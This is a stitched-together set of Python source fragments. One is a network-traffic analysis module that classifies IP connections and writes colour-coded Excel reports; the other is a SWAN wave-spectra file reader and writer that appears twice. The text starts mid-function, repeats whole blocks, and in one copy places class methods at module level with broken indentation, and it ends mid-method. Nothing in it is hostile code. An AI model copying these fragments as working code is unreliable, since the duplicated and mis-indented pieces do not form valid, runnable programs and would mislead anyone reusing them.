            wb.remove(wb[existing_name])
    return wb.create_sheet(sheet_name, index=idx)
def auto_adjust_width(sheet):
    """Widen each column to roughly fit its longest rendered value.

    NOTE(review): a column whose cells are all None makes max() raise — same
    as the original; confirm callers always have a header row.
    """
    factor = 1.7
    for col in sheet.columns:
        lengths = [len(str(cell.value)) for cell in col if cell.value is not None]
        max_width = max(lengths) * factor
        # wide columns get a gentler scaling so they don't dominate the sheet
        if max_width < 20:
            width = max_width
        else:
            width = max_width * 1.2 / 1.7
        sheet.column_dimensions[col[0].column_letter].width = width
| #!/usr/bin/env python3
# Copyright 2021 Battelle Energy Alliance, LLC
import os
import itertools
from collections import Counter
import socket
from copy import copy
import pkg_resources
import pickle
import string
import openpyxl
import openpyxl.styles
from openpyxl.worksheet.table import Table
import netaddr
from tqdm import tqdm
from navv import data_types
from navv import utilities
# Pickled lookup tables (services, conn_states) shipped with the package
DATA_PKL_FILE = pkg_resources.resource_filename(__name__, "data/data.pkl")
# Column headers of the generated Analysis sheet
COL_NAMES = [
    "Count",
    "Src_IP",
    "Src_Desc",
    "Dest_IP",
    "Dest_Desc",
    "Port",
    "Service",
    "Proto",
    "Conn_State",
    "Notes",
]
# Bold blue style applied to every header row
HEADER_STYLE = openpyxl.styles.NamedStyle(
    name="header_style",
    font=openpyxl.styles.Font(name="Calibri", size=11, bold=True),
    fill=openpyxl.styles.PatternFill("solid", fgColor="4286F4"),
)
# (fill, font) pairs used to color-code cells by address/service category.
# IPV6_CELL_COLOR is also reused for multicast/unassigned/broadcast addresses.
IPV6_CELL_COLOR = (
    openpyxl.styles.PatternFill("solid", fgColor="FFFFFF"),
    openpyxl.styles.Font(name="Calibri", size=11, color="ff0000"),
)
EXTERNAL_NETWORK_CELL_COLOR = (
    openpyxl.styles.PatternFill("solid", fgColor="030303"),
    openpyxl.styles.Font(name="Calibri", size=11, color="ffff00"),
)
INTERNAL_NETWORK_CELL_COLOR = (
    openpyxl.styles.PatternFill("solid", fgColor="ffff00"),
    openpyxl.styles.Font(name="Calibri", size=11, color="000000"),
)
ICMP_CELL_COLOR = (
    openpyxl.styles.PatternFill("solid", fgColor="ff33cc"),
    openpyxl.styles.Font(name="Calibri", size=11, color="000000"),
)
UNKNOWN_EXTERNAL_CELL_COLOR = (
    openpyxl.styles.PatternFill("solid", fgColor="ffffff"),
    openpyxl.styles.Font(name="Calibri", size=11, color="000000"),
)
# IPs whose reverse-DNS lookup already failed (appended in handle_ip;
# NOTE(review): never read back — looks vestigial, confirm before removing)
ALREADY_UNRESOLVED = list()
def get_workbook(file_name):
    """Create the blank Inventory and Segment sheets for data input into the tool"""
    if os.path.isfile(file_name):
        return openpyxl.load_workbook(file_name)
    wb = openpyxl.Workbook()
    inv_sheet = wb.active
    inv_sheet.title = "Inventory"
    seg_sheet = wb.create_sheet("Segments")
    # header row for each sheet
    for sheet, headers in ((inv_sheet, ("IP", "Name")),
                           (seg_sheet, ("Name", "Description", "CIDR"))):
        for col, header in enumerate(headers, start=1):
            sheet.cell(row=1, column=col, value=header).style = HEADER_STYLE
    return wb
@utilities.timeit
def get_inventory_data(ws, **kwargs):
    """Build {ip: InventoryItem} from the Inventory sheet (header row skipped)."""
    inventory = dict()
    for row in itertools.islice(ws.iter_rows(), 1, None):  # skip the header row
        ip_cell, name_cell = row[0], row[1]
        if not ip_cell.value or not name_cell.value:
            continue  # incomplete row
        inventory[ip_cell.value] = data_types.InventoryItem(
            ip=ip_cell.value,
            name=name_cell.value,
            color=(copy(ip_cell.fill), copy(ip_cell.font)),
        )
    return inventory
@utilities.timeit
def get_segments_data(ws):
    """Build the list of Segment objects from the Segments sheet.

    The returned list's final element is not a Segment: it is the combined
    list of every IP of every segment (used for fast membership tests).
    """
    segments = list()
    for row in itertools.islice(ws.iter_rows(), 1, None):  # skip the header row
        if not row[2].value:
            continue  # no CIDR -> not a usable segment
        segment = data_types.Segment(
            name=row[0].value,
            description=row[1].value,
            network=row[2].value,
            color=[copy(row[0].fill), copy(row[0].font)],
        )
        segments.append(segment)
    all_ips = []
    for segment in segments:
        all_ips.extend(segment.network)
    segments.append(all_ips)
    return segments
def get_package_data():
    """Load services and conn_states data into memory"""
    # the pickle stores the (services, conn_states) pair directly
    with open(DATA_PKL_FILE, "rb") as pkl_file:
        return pickle.load(pkl_file)
@utilities.timeit
def create_analysis_array(sort_input, **kwargs):
    """Turn tab-separated connection strings into AnalysisRowItem objects.

    Each element of *sort_input* is expected to be a tab-joined string of
    src_ip, dest_ip, port, proto, conn_state, mac (in that order, judging by
    the cells[] mapping below).  Returns (rows sorted by descending count,
    {mac: [private source IPs seen with that mac]}).
    """
    arr = list()
    mac_dict = dict()
    # sort by count and source IP
    counted = sorted(
        list(str(count) + "\t" + item for item, count in sorted(Counter(sort_input).items(), key=lambda x: x[0])),
        key=lambda x: int(x.split("\t")[0]),
        reverse=True,
    )
    for row in counted:
        cells = row.split("\t")
        arr.append(
            data_types.AnalysisRowItem(
                count=cells[0],
                src_ip=cells[1],
                dest_ip=cells[2],
                port=cells[3],
                proto=cells[4],
                conn=cells[5],
            )
        )
        # group private source IPs by MAC (cells[6]); str.split never yields
        # None, so the "is not None" guard only matters for empty strings
        if cells[6] is not None and cells[6] != "":
            if netaddr.IPAddress(cells[1]).is_private():
                if cells[6] not in mac_dict:
                    mac_dict[cells[6]] = [cells[1]]
                else:
                    if cells[1] not in mac_dict[cells[6]]:
                        mac_dict[cells[6]].append(cells[1])
    return arr, mac_dict
@utilities.timeit
def perform_analysis(
    wb,
    rows,
    services,
    conn_states,
    inventory,
    segments,
    dns_data,
    pkl_path,
    ext_IPs,
    unk_int_IPs,
    **kwargs,
):
    """Fill the Analysis sheet with one colored row per unique connection.

    Side effects: mutates each row in *rows* (desc/service/conn fields),
    updates *dns_data* (reverse-DNS cache, re-pickled to *pkl_path*) and the
    *ext_IPs* / *unk_int_IPs* sets discovered during lookups.
    """
    sheet = make_sheet(wb, "Analysis", idx=0)
    # header row (same values as COL_NAMES)
    sheet.append(
        [
            "Count",
            "Src_IP",
            "Src_Desc",
            "Dest_IP",
            "Dest_Desc",
            "Port",
            "Service",
            "Proto",
            "Conn_State",
            "Notes",
        ]
    )
    print("Performing analysis(including lookups). This may take a while:")
    for row_index, row in enumerate(tqdm(rows), start=2):  # row 1 is the header
        row.src_desc = handle_ip(row.src_ip, dns_data, inventory, segments, ext_IPs, unk_int_IPs)
        row.dest_desc = handle_ip(row.dest_ip, dns_data, inventory, segments, ext_IPs, unk_int_IPs)
        handle_service(row, services)
        # replace the bare state code with (code, styling/description tuple)
        row.conn = (row.conn, conn_states[row.conn])
        write_row_to_sheet(row, row_index, sheet)
    tab = Table(displayName="AnalysisTable", ref=f"A1:J{len(rows)+1}")
    sheet.add_table(tab)
    # pickle the lookupdata for future use
    with open(pkl_path, "wb") as pkl:
        pickle.dump(dns_data, pkl)
def write_row_to_sheet(row, row_index, sheet):
    """Write one analysis row into *sheet* at *row_index*, applying cell colors."""

    def _styled(column, value, fill_font):
        # write a value and apply its (fill, font) pair
        cell = sheet.cell(row=row_index, column=column, value=value)
        cell.fill = fill_font[0]
        cell.font = fill_font[1]

    sheet.cell(row=row_index, column=1, value=int(row.count))
    _styled(2, row.src_ip, row.src_desc[1])
    _styled(3, row.src_desc[0], row.src_desc[1])
    _styled(4, row.dest_ip, row.dest_desc[1])
    _styled(5, row.dest_desc[0], row.dest_desc[1])
    sheet.cell(row=row_index, column=6, value=int(row.port))
    _styled(7, row.service[0], row.service[1])
    sheet.cell(row=row_index, column=8, value=row.proto)
    _styled(9, row.conn[0], row.conn[1])
    # placeholder for notes cell
    sheet.cell(row=row_index, column=10, value="")
def handle_service(row, services):
    """Fill row.service; for ICMP the 'port' actually carries the ICMP type.

    services layout: { port: { proto: (name, (fill, font)) } }
    """
    known = services.get(row.port, {})
    if row.proto in known:
        row.service = known[row.proto]
        return
    if row.proto != "icmp":
        row.service = ("unknown service", UNKNOWN_EXTERNAL_CELL_COLOR)
        return
    # classify ICMP version by the source address family
    if netaddr.valid_ipv4(row.src_ip):
        row.proto = "ICMPv4"
        service_dict = data_types.icmp4_types
    else:
        row.proto = "ICMPv6"
        service_dict = data_types.icmp6_types
    name = service_dict.get(row.port, "unknown icmp")
    row.service = (name, ICMP_CELL_COLOR)
def handle_ip(ip_to_check, dns_data, inventory, segments, ext_IPs, unk_int_IPs):
    """Function take IP Address and uses collected dns_data, inventory, and segment information to give IP Addresses in analysis context.
    Priority flow:
    * DHCP Broadcasting
    * Multicast
    * Within Segments identified
    * Within Inventory, not within an Identified Segment
    * Private Network
    * External (Public IP space) or Internet
    This will capture the name description and the color coding identified within the worksheet.
    Returns a (description, (fill, font)) tuple.
    """
    #
    if ip_to_check == str("0.0.0.0"):
        desc_to_change = (
            "Unassigned IPv4",
            IPV6_CELL_COLOR,
        )
    elif ip_to_check == str("255.255.255.255"):
        desc_to_change = (
            "IPv4 All Subnet Broadcast",
            IPV6_CELL_COLOR,
        )
    elif netaddr.valid_ipv6(ip_to_check) or netaddr.IPAddress(ip_to_check).is_multicast():
        desc_to_change = (
            f"{'IPV6' if netaddr.valid_ipv6(ip_to_check) else 'IPV4'}{'_Multicast' if netaddr.IPAddress(ip_to_check).is_multicast() else ''}",
            IPV6_CELL_COLOR,
        )
    elif ip_to_check in segments[len(segments) - 1]:  # last element = all segment IPs
        for segment in segments[:-1]:
            if ip_to_check not in segment.network:
                continue
            if ip_to_check in dns_data:
                desc_to_change = (dns_data[ip_to_check], segment.color)
            # NOTE(review): when the IP is not in the inventory, the else below
            # overwrites the dns_data description set just above — confirm intended
            if ip_to_check in inventory:
                desc_to_change = (inventory[ip_to_check].name, segment.color)
            else:
                desc_to_change = (
                    f"Unknown device in {segment.name} network",
                    segment.color,
                )
                unk_int_IPs.add(ip_to_check)
    elif ip_to_check in inventory:
        desc_to_change = (inventory[ip_to_check].name, inventory[ip_to_check].color)
    elif netaddr.IPAddress(ip_to_check).is_private():
        if ip_to_check in dns_data:
            desc_to_change = (dns_data[ip_to_check], INTERNAL_NETWORK_CELL_COLOR)
        else:
            desc_to_change = ("Unknown Internal address", INTERNAL_NETWORK_CELL_COLOR)
            unk_int_IPs.add(ip_to_check)
    else:
        ext_IPs.add(ip_to_check)
        if ip_to_check in dns_data:
            resolution = dns_data[ip_to_check]
        else:
            try:
                resolution = socket.gethostbyaddr(ip_to_check)[0]
            except socket.herror:
                resolution = "Unresolved external address"
                ALREADY_UNRESOLVED.append(ip_to_check)
            finally:
                dns_data[ip_to_check] = resolution  # cache for future calls
        desc_to_change = (resolution, EXTERNAL_NETWORK_CELL_COLOR)
    return desc_to_change
def write_conn_states_sheet(conn_states, wb):
    """Write the Conn_States reference sheet: colored state code + description.

    conn_states values are indexed as [0]=fill, [1]=font, [2]=description.
    """
    ws = make_sheet(wb, "Conn_States", idx=8)
    ws.append(["State", "Description"])
    for row_num, (state, info) in enumerate(conn_states.items(), start=2):
        fill, font, description = info[0], info[1], info[2]
        for col, value in (("A", state), ("B", description)):
            cell = ws[f"{col}{row_num}"]
            cell.value = value
            cell.fill = fill
            cell.font = font
    auto_adjust_width(ws)
def write_macs_sheet(mac_dict, wb):
    """Fill spreadsheet with MAC address -> IP address translation with manufacturer information"""
    macs_sheet = make_sheet(wb, "MACs", idx=4)
    macs_sheet.append(["MAC", "Manufacturer", "IPs"])
    for row_index, mac in enumerate(mac_dict, start=2):
        macs_sheet[f"A{row_index}"].value = mac
        # look up the manufacturer(s) in the OUI registry
        try:
            eui = netaddr.EUI(mac)
            oui = eui.oui
            orgs = [oui.registration(i).org for i in range(oui.reg_count)]
        except netaddr.core.NotRegisteredError:
            orgs = ["Not a registered manufacturer"]
        except netaddr.core.AddrFormatError:
            orgs = [f"Bad MAC address {mac}"]
        except Exception:
            # catch-all so one malformed entry cannot abort the whole sheet
            orgs = ["Unspecified MAC error"]
        macs_sheet[f"B{row_index}"].value = "\n".join(orgs)
        ip_list_cell = macs_sheet[f"C{row_index}"]
        ip_list_cell.alignment = openpyxl.styles.Alignment(wrap_text=True)
        num_ips = len(mac_dict[mac])
        # show at most 10 IPs per MAC to keep the cell readable
        if num_ips > 10:
            display_list = mac_dict[mac][:10]
            display_list.append(f"Displaying 10 IPs of {num_ips}")
            ip_list_cell.value = "\n".join(display_list)
        else:
            ip_list_cell.value = "\n".join(mac_dict[mac][:10])
        # ~15 points per text line, capped at 11 lines (10 IPs + overflow note)
        macs_sheet.row_dimensions[row_index].height = min(num_ips, 11) * 15
        if row_index % 2 == 0:  # zebra-stripe even rows
            for cell in macs_sheet[f"{row_index}:{row_index}"]:
                cell.fill = openpyxl.styles.PatternFill("solid", fgColor="AAAAAA")
    auto_adjust_width(macs_sheet)
    macs_sheet.column_dimensions["C"].width = 39 * 1.2
def write_externals_sheet(IPs, wb):
    """List all observed external IPs on their own sheet, zebra-striped."""
    ext_sheet = make_sheet(wb, "Externals", idx=5)
    ext_sheet.append(["External IP"])
    row_index = 2
    for ip in sorted(IPs):
        cell = ext_sheet[f"A{row_index}"]
        cell.value = ip
        if row_index % 2 == 0:  # stripe even rows
            cell.fill = openpyxl.styles.PatternFill("solid", fgColor="AAAAAA")
        row_index += 1
    auto_adjust_width(ext_sheet)
def write_unknown_internals_sheet(IPs, wb):
    """List internal IPs that could not be matched to inventory or segments."""
    # NOTE: sheet name 'Unkown_Internals' is misspelled but kept as-is,
    # since consumers may reference the sheet by that exact name
    int_sheet = make_sheet(wb, "Unkown_Internals", idx=6)
    int_sheet.append(["Unknown Internal IP"])
    for row_index, ip in enumerate(sorted(IPs), start=2):
        cell = int_sheet[f"A{row_index}"]
        cell.value = ip
        if row_index % 2 == 0:  # stripe even rows
            cell.fill = openpyxl.styles.PatternFill("solid", fgColor="AAAAAA")
    auto_adjust_width(int_sheet)
def write_stats_sheet(wb, stats):
    """Write capture statistics to the Stats sheet.

    NOTE: mutates *stats* (pops 'Length of Capture time').  Column letters
    come from ascii_uppercase, so at most 25 further stats fit (B..Z).
    """
    stats_sheet = make_sheet(wb, "Stats", idx=7)
    stats_sheet.append(["Length of Capture time"] + [column for column in stats if column != "Length of Capture time"])
    stats_sheet["A2"] = stats.pop("Length of Capture time")
    for col_index, stat in enumerate(stats, 1):
        stats_sheet[f"{string.ascii_uppercase[col_index]}2"].value = stats[stat]
    auto_adjust_width(stats_sheet)
def make_sheet(wb, sheet_name, idx=None):
    """Create the sheet if it doesn't already exist otherwise remove it and recreate it"""
    for existing_name in list(wb.sheetnames):
        if existing_name == sheet_name:
            wb.remove(wb[existing_name])
    return wb.create_sheet(sheet_name, index=idx)
def auto_adjust_width(sheet):
    """Widen each column to roughly fit its longest rendered value.

    NOTE(review): a column whose cells are all None makes max() raise — same
    as the original; confirm callers always have a header row.
    """
    factor = 1.7
    for col in sheet.columns:
        lengths = [len(str(cell.value)) for cell in col if cell.value is not None]
        max_width = max(lengths) * factor
        # wide columns get a gentler scaling so they don't dominate the sheet
        if max_width < 20:
            width = max_width
        else:
            width = max_width * 1.2 / 1.7
        sheet.column_dimensions[col[0].column_letter].width = width
|
"""Read and write swan spectra files"""
import os
import re
import gzip
import datetime
import pandas as pd
import numpy as np
from wavespectra.core.attributes import attrs
from wavespectra.core.utils import to_nautical
E2V = 1025 * 9.81  # presumably seawater density * gravity; divisor applied when the file stores spectra in Joule units
class SwanSpecFile(object):
"""Read spectra in SWAN ASCII format."""
    def __init__(
        self,
        filename,
        freqs=None,
        dirs=None,
        x=None,
        y=None,
        time=False,
        id="Swan Spectrum",
        dirorder=False,
        append=False,
        tabfile=None,
    ):
        """Open a SWAN ASCII spectra file for reading or writing.

        If *freqs* is given the file is opened for writing and a header is
        emitted; otherwise the existing file's header is parsed to discover
        locations, frequencies, directions and units.  Gzipped files (.gz)
        are transparently supported.
        """
        self.times = False
        self.filename = filename
        # companion table file: same basename with a .tab extension
        self.tabfile = (
            tabfile or os.path.splitext(self.filename.replace(".gz", ""))[0] + ".tab"
        )
        self.is_tab = False
        self.buf = None  # one-line lookahead used by _read_header
        extention = os.path.splitext(self.filename)[-1]
        if extention == ".gz":
            fopen = gzip.open
        else:
            fopen = open
        if freqs is not None:  # Writable file
            self.freqs = np.array(freqs)
            self.dirs = np.array(dirs)
            self.x = np.array(x)
            self.y = np.array(y)
            if time:
                self.times = []
            self.fid = fopen(filename, "w")
            self.write_header(time, id)
            self.fmt = len(self.dirs) * "{:5.0f}"
        else:
            self.fid = fopen(filename, "r+" if append else "r")
            self._read_header("SWAN")
            # skip comment lines (starting with $)
            while True:
                if not self._read_header("$"):
                    break
            if self._read_header("TIME"):
                self._read_header("1")
                self.times = []  # a list signals a time-dependent file (see read())
            # location block: spherical (LONLAT) or cartesian (LOCATIONS)
            self.x = []
            self.y = []
            locs = self._read_header("LONLAT", True) or self._read_header(
                "LOCATIONS", True
            )
            for ip in locs:
                xy = [float(val) for val in ip.split()]
                self.x.append(xy[0])
                self.y.append(xy[1])
            self.x = np.array(self.x)
            self.y = np.array(self.y)
            # frequencies: absolute (AFREQ) or relative (RFREQ)
            self.afreq = self._read_header("AFREQ", True)
            self.rfreq = self._read_header("RFREQ", True)
            # directions: nautical (NDIR) or cartesian (CDIR, converted below)
            self.ndir = self._read_header("NDIR", True)
            self.cdir = self._read_header("CDIR", True)
            if self.afreq:
                self.freqs = np.array([float(val) for val in self.afreq])
            else:
                self.freqs = np.array([float(val) for val in self.rfreq])
            if self.ndir:
                self.dirs = np.array([float(val) for val in self.ndir])
            else:
                self.dirs = to_nautical(np.array([float(val) for val in self.cdir]))
            self._read_header("QUANT", True)
            # Figure units out, if Energy density factor needs to be applied
            units = self.fid.readline().strip().split()[0]
            if units.upper().startswith("J"):
                self.units_factor = E2V
            else:
                self.units_factor = 1.0
            self.excval = int(float(self.fid.readline().split()[0]))
        if dirorder:
            # sort directions into ascending [0, 360) order; dirmap reorders spectra
            self.dirmap = list(np.argsort(self.dirs % 360.0))
            self.dirs = self.dirs[self.dirmap] % 360.0
        else:
            self.dirmap = False
        lons = np.unique(self.x)
        lats = np.unique(self.y)
        # regular grid when every lon/lat combination has a location
        self.is_grid = len(lons) * len(lats) == len(self.x)
        self.is_tab = (os.path.isfile(self.tabfile)) & (len(lons) * len(lats) == 1)
def _read_header(self, keyword, numspec=False):
    """Scan the next header line for *keyword*.

    Args:
        keyword (str): token to search for in the next header line.
        numspec (bool): when True the keyword line is followed by a count
            line ("<n> ..."); read the next ``n`` lines and return them.

    Returns:
        The matching line (or list of ``n`` lines when ``numspec=True``)
        if the keyword was found, otherwise ``False``.

    Note:
        ``self.buf`` is a one-line lookahead buffer: a line that did not
        match is kept so the next call re-tests the same line instead of
        consuming new input.
    """
    # Refill the lookahead buffer only when it is empty.
    if not self.buf:
        self.buf = self.fid.readline()
    if self.buf.find(keyword) >= 0:
        if numspec:
            # The keyword line is followed by a line whose first integer
            # gives the number of data lines belonging to this section.
            line = self.fid.readline()
            n = int(re.findall(r"\b(\d+)\b", line)[0])
            self.buf = [self.fid.readline() for i in range(0, n)]
        rtn = self.buf
        # Consume the buffer on a match so the next call reads fresh input.
        self.buf = None
    else:
        rtn = False
    return rtn
def read(self):
    """Read single timestep from current position in file.

    Returns:
        List of 2D arrays S(freq, dir), one per site, divided by
        ``self.units_factor`` — or ``None`` when the file is closed,
        exhausted, or no recognised data block follows.
    """
    if not self.fid:
        return None
    # Time-dependent files: each timestep starts with a yyyymmdd.HHMMSS stamp.
    if isinstance(self.times, list):
        line = self.fid.readline()
        if line:
            ttime = datetime.datetime.strptime(line[0:15], "%Y%m%d.%H%M%S")
            self.times.append(ttime)
        else:
            # End of file.
            return None
    Sout = []
    for ip, pp in enumerate(self.x):
        # Default to all-NaN so a NODATA block yields missing values.
        Snew = np.nan * np.zeros((len(self.freqs), len(self.dirs)))
        if self._read_header("NODATA"):
            pass
        else:
            if self._read_header("ZERO"):
                Snew = np.zeros((len(self.freqs), len(self.dirs)))
            elif self._read_header("FACTOR"):
                # Values are stored as scaled integers; FACTOR restores them.
                fac = float(self.fid.readline())
                for i, f in enumerate(self.freqs):
                    line = self.fid.readline()
                    lsplit = line.split()
                    try:
                        Snew[i, :] = [float(val) for val in lsplit]
                    except Exception:
                        import warnings

                        # NOTE(review): silently skips malformed rows — the
                        # original author left this unresolved; confirm intent.
                        warnings.warn("Check what this is supposed to be doing.")
                        pass
                Snew *= fac
                if self.dirmap:
                    # Reorder direction columns into sorted order (see __init__).
                    Snew = Snew[:, self.dirmap]
            else:  # For files with no timestamp
                return None
        # Convert energy density (J/m2/Hz/deg) to variance density if needed.
        Sout.append(Snew / self.units_factor)
    return Sout
def readall(self):
    """Yield every timestep in the file until the data is exhausted."""
    spectra = self.read()
    while spectra:
        yield spectra
        spectra = self.read()
def write_header(self, time=False, str1="", str2="", timecode=1, excval=-99):
    """Write header to file.

    Builds the SWAN ASCII header (fixed-width: 40-char keyword field
    followed by a free-text description) and writes it in one call.

    Args:
        time (bool): write the TIME section for time-dependent data.
        str1 (str): first comment line after the file identifier.
        str2 (str): second comment line after the file identifier.
        timecode (int): SWAN time coding option (written only when ``time``).
        excval (float): exception value flagging missing data.
    """
    # Description
    strout = "{:40}{}\n".format("SWAN 1", "Swan standard spectral file")
    strout += "{:4}{}\n".format("$", str1)
    strout += "{:4}{}\n".format("$", str2)
    # Time
    if time:
        strout += "{:40}{}\n".format("TIME", "time-dependent data")
        strout += "{:>6d}{:34}{}\n".format(timecode, "", "time coding option")
    # Location
    strout += "{:40}{}\n".format("LONLAT", "locations in spherical coordinates")
    strout += "{:>6d}{:34}{}\n".format(len(self.x), "", "number of locations")
    for x, y in zip(self.x, self.y):
        strout += "{:2}{:<0.6f}{:2}{:<0.6f}\n".format("", x, "", y)
    # Frequency
    strout += "{:40}{}\n".format("AFREQ", "absolute frequencies in Hz")
    strout += "{:6d}{:34}{}\n".format(len(self.freqs), "", "number of frequencies")
    for freq in self.freqs:
        strout += "{:>11.5f}\n".format(freq)
    # Direction
    strout += "{:40}{}\n".format("NDIR", "spectral nautical directions in degr")
    strout += "{:6d}{:34}{}\n".format(len(self.dirs), "", "number of directions")
    for wdir in self.dirs:
        strout += "{:>11.4f}\n".format(wdir)
    # Data
    strout += "QUANT\n{:>6d}{:34}{}\n".format(
        1, "", "number of quantities in table"
    )
    strout += "{:40}{}\n".format("VaDens", "variance densities in m2/Hz/degr")
    strout += "{:40}{}\n".format("m2/Hz/degr", "unit")
    strout += "{:3}{:<37g}{}\n".format("", excval, "exception value")
    # Dumping
    self.fid.write(strout)
def write_spectra(self, arr, time=None):
    """Write spectra from single timestamp.

    Args:
        arr (3D ndarray): spectra to write S(site, freq, dim).
        time (yyymmdd.HHMMSS): time of spectra to write.
    """
    if time is not None:
        # FIX: the original reused double quotes inside a double-quoted
        # f-string, which is a SyntaxError on Python < 3.12 (quote reuse
        # was only allowed by PEP 701). Use single quotes inside.
        self.fid.write(f"{time:40}{'date and time'}\n")
    for spec in arr:
        # Scale so the largest value fits the 5-character integer format
        # used by np.savetxt below (max scaled value ~9998).
        fac = spec.max() / 9998.0
        if np.isnan(fac):
            # max() is NaN only when the spectrum contains NaN -> no data.
            self.fid.write("NODATA\n")
        elif fac <= 0:
            self.fid.write("ZERO\n")
        else:
            # Same pre-3.12 quoting fix as above.
            self.fid.write(f"FACTOR\n{'':4}{fac:0.8E}\n")
            np.savetxt(self.fid, spec / fac, fmt="%5.0f", delimiter="")
def close(self):
    """Release the underlying file handle, if one is open."""
    handle = self.fid
    if handle:
        handle.close()
    self.fid = False
def read_tab(filename, toff=0):
    """Read swan table file.

    Args:
        filename (str): name of SWAN tab file to read
        toff (float): timezone offset in hours

    Returns:
        Pandas DataFrame object
    """
    # NOTE(review): `delim_whitespace` is deprecated and `date_parser` was
    # removed in pandas >= 2.0 — confirm the pinned pandas version before
    # upgrading.
    df = pd.read_csv(
        filename,
        delim_whitespace=True,
        skiprows=[0, 1, 2, 3, 5, 6],  # SWAN tab banner/header lines
        parse_dates=[0],
        date_parser=_dateparse,
        index_col=0,
    )
    df.index.name = attrs.TIMENAME
    # Apply the timezone offset by shifting the index in whole hours.
    df.index = df.index.shift(toff, freq="1H")
    # Column labels in the raw file are offset by one relative to the data:
    # each column is renamed to its right-hand neighbour's label (right to
    # left) and the last column dropped — presumably to realign headers;
    # verify against the SWAN tab layout.
    for col1, col2 in zip(df.columns[-1:0:-1], df.columns[-2::-1]):
        df = df.rename(columns={col2: col1})
    return df.iloc[:, 0:-1]
def _dateparse(x):
"""Date parsing to read SWAN tab files."""
return datetime.datetime.strptime(x, "%Y%m%d.%H%M%S")
| """Read and write swan spectra files"""
import os
import re
import gzip
import datetime
import pandas as pd
import numpy as np
from wavespectra.core.attributes import attrs
from wavespectra.core.utils import to_nautical
E2V = 1025 * 9.81
class SwanSpecFile(object):
    """Read spectra in SWAN ASCII format."""

    def __init__(
        self,
        filename,
        freqs=None,
        dirs=None,
        x=None,
        y=None,
        time=False,
        id="Swan Spectrum",
        dirorder=False,
        append=False,
        tabfile=None,
    ):
        """Open a SWAN spectra file for reading or writing.

        Args:
            filename (str): file to open; ``.gz`` files are handled via gzip.
            freqs: frequencies to write; when given the file is opened for
                WRITING, otherwise it is opened and parsed for READING.
            dirs: directions to write (write mode only).
            x, y: site coordinates to write (write mode only).
            time (bool): whether the file is time-dependent.
            id (str): identifier written in the header (write mode).
            dirorder (bool): sort directions ascending modulo 360.
            append (bool): open an existing file for appending (read mode).
            tabfile (str): companion table file; defaults to
                ``<filename-without-ext>.tab``.
        """
        # `times` stays False for stationary files; becomes a list when
        # the file is time-dependent.
        self.times = False
        self.filename = filename
        self.tabfile = (
            tabfile or os.path.splitext(self.filename.replace(".gz", ""))[0] + ".tab"
        )
        self.is_tab = False
        # One-line lookahead buffer used by `_read_header`.
        self.buf = None
        extention = os.path.splitext(self.filename)[-1]
        if extention == ".gz":
            fopen = gzip.open
        else:
            fopen = open
        if freqs is not None:  # Writable file
            self.freqs = np.array(freqs)
            self.dirs = np.array(dirs)
            self.x = np.array(x)
            self.y = np.array(y)
            if time:
                self.times = []
            self.fid = fopen(filename, "w")
            self.write_header(time, id)
            self.fmt = len(self.dirs) * "{:5.0f}"
        else:
            self.fid = fopen(filename, "r+" if append else "r")
            self._read_header("SWAN")
            # Skip comment lines starting with "$".
            while True:
                if not self._read_header("$"):
                    break
            if self._read_header("TIME"):
                self._read_header("1")
                self.times = []
            self.x = []
            self.y = []
            locs = self._read_header("LONLAT", True) or self._read_header(
                "LOCATIONS", True
            )
            for ip in locs:
                xy = [float(val) for val in ip.split()]
                self.x.append(xy[0])
                self.y.append(xy[1])
            self.x = np.array(self.x)
            self.y = np.array(self.y)
            # Frequencies may be absolute (AFREQ) or relative (RFREQ);
            # directions nautical (NDIR) or cartesian (CDIR).
            self.afreq = self._read_header("AFREQ", True)
            self.rfreq = self._read_header("RFREQ", True)
            self.ndir = self._read_header("NDIR", True)
            self.cdir = self._read_header("CDIR", True)
            if self.afreq:
                self.freqs = np.array([float(val) for val in self.afreq])
            else:
                self.freqs = np.array([float(val) for val in self.rfreq])
            if self.ndir:
                self.dirs = np.array([float(val) for val in self.ndir])
            else:
                # Cartesian directions are converted to nautical convention.
                self.dirs = to_nautical(np.array([float(val) for val in self.cdir]))
            self._read_header("QUANT", True)
            # Figure units out, if Energy density factor needs to be applied
            units = self.fid.readline().strip().split()[0]
            if units.upper().startswith("J"):
                self.units_factor = E2V
            else:
                self.units_factor = 1.0
            self.excval = int(float(self.fid.readline().split()[0]))
        if dirorder:
            # Sort direction columns into ascending order modulo 360.
            self.dirmap = list(np.argsort(self.dirs % 360.0))
            self.dirs = self.dirs[self.dirmap] % 360.0
        else:
            self.dirmap = False
        lons = np.unique(self.x)
        lats = np.unique(self.y)
        # A regular grid has exactly len(lons)*len(lats) sites.
        self.is_grid = len(lons) * len(lats) == len(self.x)
        self.is_tab = (os.path.isfile(self.tabfile)) & (len(lons) * len(lats) == 1)

    def _read_header(self, keyword, numspec=False):
        """Scan the next header line for *keyword*.

        Returns the matching line (or list of lines when ``numspec=True``)
        if found, otherwise ``False``. ``self.buf`` is a one-line lookahead
        buffer so a non-matching line is re-tested by the next call.
        """
        if not self.buf:
            self.buf = self.fid.readline()
        if self.buf.find(keyword) >= 0:
            if numspec:
                # Keyword line is followed by "<n> ..."; read n data lines.
                line = self.fid.readline()
                n = int(re.findall(r"\b(\d+)\b", line)[0])
                self.buf = [self.fid.readline() for i in range(0, n)]
            rtn = self.buf
            # Consume on match so the next call reads fresh input.
            self.buf = None
        else:
            rtn = False
        return rtn

    def read(self):
        """Read single timestep from current position in file."""
        if not self.fid:
            return None
        # Time-dependent files start each step with a yyyymmdd.HHMMSS stamp.
        if isinstance(self.times, list):
            line = self.fid.readline()
            if line:
                ttime = datetime.datetime.strptime(line[0:15], "%Y%m%d.%H%M%S")
                self.times.append(ttime)
            else:
                return None
        Sout = []
        for ip, pp in enumerate(self.x):
            # Default to all-NaN so a NODATA block yields missing values.
            Snew = np.nan * np.zeros((len(self.freqs), len(self.dirs)))
            if self._read_header("NODATA"):
                pass
            else:
                if self._read_header("ZERO"):
                    Snew = np.zeros((len(self.freqs), len(self.dirs)))
                elif self._read_header("FACTOR"):
                    # Values are stored as scaled integers.
                    fac = float(self.fid.readline())
                    for i, f in enumerate(self.freqs):
                        line = self.fid.readline()
                        lsplit = line.split()
                        try:
                            Snew[i, :] = [float(val) for val in lsplit]
                        except Exception:
                            import warnings

                            # NOTE(review): silently skips malformed rows.
                            warnings.warn("Check what this is supposed to be doing.")
                            pass
                    Snew *= fac
                    if self.dirmap:
                        Snew = Snew[:, self.dirmap]
                else:  # For files with no timestamp
                    return None
            # Convert energy density to variance density when required.
